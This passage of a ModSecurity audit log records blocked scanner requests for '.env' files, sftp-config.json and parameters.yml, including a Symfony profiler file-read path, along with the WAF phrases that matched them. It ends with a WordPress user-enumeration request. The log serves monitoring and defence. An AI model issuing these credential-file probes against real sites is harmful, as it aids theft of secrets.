Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3454d27f-Z-- --e7412f48-A-- [24/Apr/2025:15:34:21 +0700] aAn3jfiVYlyO1xhz7yMVUwAAAMU 103.236.140.4 46886 103.236.140.4 8181 --e7412f48-B-- GET /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.235 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.235 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --e7412f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7412f48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483661055875 838 (- - -) Stopwatch2: 1745483661055875 838; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7412f48-Z-- --46b4f76b-A-- [24/Apr/2025:15:34:22 +0700] aAn3jslQo524fhbIj1zdvAAAABc 103.236.140.4 46892 103.236.140.4 8181 --46b4f76b-B-- POST /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.238 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --46b4f76b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4f76b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483662266661 834 (- - -) Stopwatch2: 1745483662266661 834; combined=342, p1=306, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4f76b-Z-- --13cf3130-A-- [24/Apr/2025:15:34:23 +0700] aAn3j8lQo524fhbIj1zdvQAAABU 103.236.140.4 46898 103.236.140.4 8181 --13cf3130-B-- GET /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.112 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --13cf3130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13cf3130-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483663283899 766 (- - -) Stopwatch2: 1745483663283899 766; combined=285, p1=248, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13cf3130-Z-- --f3cf9806-A-- [24/Apr/2025:15:34:24 +0700] aAn3kMlQo524fhbIj1zdvwAAABE 103.236.140.4 46908 103.236.140.4 8181 --f3cf9806-B-- POST /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.116 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --f3cf9806-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cf9806-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483664826623 846 (- - -) Stopwatch2: 1745483664826623 846; combined=313, p1=276, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cf9806-Z-- --1e92687e-A-- [24/Apr/2025:15:34:56 +0700] aAn3sN5yz20UX9VrdZM2NQAAAEc 103.236.140.4 47078 103.236.140.4 8181 --1e92687e-B-- GET /sftp-config.json HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --1e92687e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e92687e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483696716740 765 (- - -) Stopwatch2: 1745483696716740 765; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e92687e-Z-- --b9bd4b37-A-- [24/Apr/2025:15:35:23 +0700] aAn3y2Luk3f9kLjsdTbwsQAAAIg 103.236.140.4 47232 103.236.140.4 8181 --b9bd4b37-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.121 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --b9bd4b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bd4b37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483723598120 774 (- - -) Stopwatch2: 1745483723598120 774; combined=322, p1=286, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bd4b37-Z-- --7493386e-A-- [24/Apr/2025:15:35:24 +0700] aAn3zGLuk3f9kLjsdTbwsgAAAII 103.236.140.4 47234 103.236.140.4 8181 --7493386e-B-- GET /_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --7493386e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7493386e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483724504120 763 (- - -) Stopwatch2: 1745483724504120 763; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7493386e-Z-- --4ecf1a0d-A-- [24/Apr/2025:15:35:25 +0700] aAn3zWLuk3f9kLjsdTbwtAAAAIc 103.236.140.4 47244 103.236.140.4 8181 --4ecf1a0d-B-- GET /app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.120 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --4ecf1a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ecf1a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483725916782 776 (- - -) Stopwatch2: 1745483725916782 776; combined=385, p1=289, p2=0, p3=0, p4=0, p5=96, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ecf1a0d-Z-- --19a19f3d-A-- [24/Apr/2025:15:35:26 +0700] aAn3zmLuk3f9kLjsdTbwtgAAAI8 103.236.140.4 47252 103.236.140.4 8181 --19a19f3d-B-- GET /config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.240 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --19a19f3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a19f3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483726857313 757 (- - -) Stopwatch2: 1745483726857313 757; combined=296, p1=261, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a19f3d-Z-- --afb5f76c-A-- [24/Apr/2025:15:52:43 +0700] aAn722Luk3f9kLjsdTbxuAAAAJY 103.236.140.4 51224 103.236.140.4 8181 --afb5f76c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.207.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.207.219 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afb5f76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afb5f76c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745484763587154 739 (- - -) Stopwatch2: 1745484763587154 739; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afb5f76c-Z-- --2245a31d-A-- [24/Apr/2025:16:53:11 +0700] aAoKB95yz20UX9VrdZM6PQAAAE0 103.236.140.4 37502 103.236.140.4 8181 --2245a31d-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --2245a31d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2245a31d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488391681197 807 (- - -) Stopwatch2: 1745488391681197 807; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2245a31d-Z-- --867b0d7c-A-- [24/Apr/2025:16:53:13 +0700] aAoKCfiVYlyO1xhz7yMZJwAAAMg 103.236.140.4 37508 103.236.140.4 8181 --867b0d7c-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --867b0d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --867b0d7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488393085453 730 (- - -) Stopwatch2: 1745488393085453 730; combined=338, p1=301, p2=0, p3=0, p4=0, p5=37, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --867b0d7c-Z-- --6216ab65-A-- [24/Apr/2025:16:53:14 +0700] aAoKCviVYlyO1xhz7yMZKQAAAMs 103.236.140.4 37514 103.236.140.4 8181 --6216ab65-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --6216ab65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6216ab65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488394461378 759 (- - -) Stopwatch2: 1745488394461378 759; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6216ab65-Z-- --164ca932-A-- [24/Apr/2025:16:53:15 +0700] aAoKC95yz20UX9VrdZM6PgAAAFM 103.236.140.4 37520 103.236.140.4 8181 --164ca932-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --164ca932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --164ca932-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488395163267 653 (- - -) Stopwatch2: 1745488395163267 653; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --164ca932-Z-- --b7b40c6d-A-- [24/Apr/2025:16:53:15 +0700] aAoKC_iVYlyO1xhz7yMZLAAAAMQ 103.236.140.4 37526 103.236.140.4 8181 --b7b40c6d-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b7b40c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7b40c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488395842488 612 (- - -) Stopwatch2: 1745488395842488 612; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7b40c6d-Z-- --36c4ba5a-A-- [24/Apr/2025:16:53:16 +0700] aAoKDN5yz20UX9VrdZM6PwAAAFc 103.236.140.4 37528 103.236.140.4 8181 --36c4ba5a-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --36c4ba5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c4ba5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488396520179 799 (- - -) Stopwatch2: 1745488396520179 799; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c4ba5a-Z-- --2c281e08-A-- [24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLQAAAM4 103.236.140.4 37530 103.236.140.4 8181 --2c281e08-B-- GET /.env.secret HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --2c281e08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c281e08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488397193929 702 (- - -) Stopwatch2: 1745488397193929 702; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c281e08-Z-- --a0215d57-A-- [24/Apr/2025:16:53:17 +0700] aAoKDfiVYlyO1xhz7yMZLwAAANE 103.236.140.4 37536 103.236.140.4 8181 --a0215d57-B-- GET /.env.staging.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --a0215d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0215d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488397876388 774 (- - -) Stopwatch2: 1745488397876388 774; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0215d57-Z-- --5dc3ec15-A-- [24/Apr/2025:16:53:19 +0700] aAoKD95yz20UX9VrdZM6QQAAAEI 103.236.140.4 37542 103.236.140.4 8181 --5dc3ec15-B-- GET /configuration/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --5dc3ec15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dc3ec15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488399245507 681 (- - -) Stopwatch2: 1745488399245507 681; combined=285, p1=249, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dc3ec15-Z-- --8b79af03-A-- [24/Apr/2025:16:53:20 +0700] aAoKEPiVYlyO1xhz7yMZMQAAANI 103.236.140.4 37552 103.236.140.4 8181 --8b79af03-B-- GET /.env.config HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --8b79af03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b79af03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488400607016 838 (- - -) Stopwatch2: 1745488400607016 838; combined=404, p1=370, p2=0, p3=0, p4=0, p5=34, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b79af03-Z-- --b1c2900a-A-- [24/Apr/2025:17:37:30 +0700] aAoUaslQo524fhbIj1zlvQAAABE 103.236.140.4 47912 103.236.140.4 8181 --b1c2900a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 